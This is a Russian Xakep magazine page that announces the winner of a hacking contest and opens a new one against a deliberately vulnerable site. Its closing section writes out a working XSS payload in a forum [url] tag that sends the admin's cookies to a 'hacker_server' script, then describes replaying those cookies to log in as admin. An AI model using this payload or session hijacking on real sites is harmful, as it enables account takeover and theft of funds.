Х-КОНКУРС: ограбление обменного пункта

Xakep, номер #065, стр. 065-083-1

Наступило время подвести итоги нашего третьего хак-конкурса, основной задачей которого было получение админских привилегий в форуме. Сразу хочу поздравить SparkLone (sparklone@mail.ru) – ему удалось хитрым образом внедрить специально подготовленный JavaScript, который успешно стырил админское «печенье». В итоге XSS-атака была благополучно реализована, и SparkLone получил права администратора. SparkLone! Приезжай в редакцию, мы пожмем твою мужественную руку и вручим ценный приз. Ну а теперь перейдем к новому конкурсу. В этот раз он будет особенно интересным! Дело в том, что если сейчас тебе удастся выполнить поставленную задачу, твой кошелек увеличится в объеме из-за того, что к нему (к твоему портмоне) наведаются американские зеленые президенты :). Думаю, ты уже понял, что их можно «одолжить» лет, эдак, на сто у падонкаф ;). Фишка в том, что последние теперь решили заняться бизнесом и открыли на своем сайте обменный пункт WebMoney, который тебе как раз и придется ограбить. Какой же, собственно говоря, урологический массаж нужно сделать в этот раз нашему многострадальному сайту www.padonak.ru, чтобы получить лавандос? Для того чтобы честно украсть падонкафские деньги, необходимо завладеть их WebMoney-аккаунтом. Сделать это можно следующим образом. Используя баги в дырявых скриптах, нужно утащить с сервера файл ключей *.kwm, файл истории операций *.pwm, узнать пароль от их WM-идентификатора и почтового ящика. Если тебе удастся проникнуть на сервер через специально оставленные дыры и собрать вышеперечисленную инфу – смело переводи бабки на свой счет и пиши об этом на мыло конкурса (konkurs@real.xakep.ru). Мы с радостью занесем твой героический подвиг в историю ][.

Как пройти апрельский конкурс

Если ты проверишь теги форума на дырки, то найдешь баг в теге URL. Достаточно было подготовить скрипт cookie.cgi, записывающий все, что ему передают через параметры, и вставить в свое сообщение строку «[url=http://padonak.ru onclick=javascript:location.href=’http://hacker_server/cgi-bin/cookie.cgi?’+document.cookie;]ссылка для админа[/url]», чтобы похитить кукисы администратора, кликнувшего по ссылке. Далее нужно было с помощью какой-нибудь программы редактирования плюшек (например, с помощью Cookie Editor’a) залить украденные админские куки к себе на комп. Если после этого действия ты закроешь браузер и откроешь его заново, после чего зайдешь на www.padonak.ru, тогда окажешься залогиненным под админом форума. Более подробное описание смотри в видеоуроке этого номера.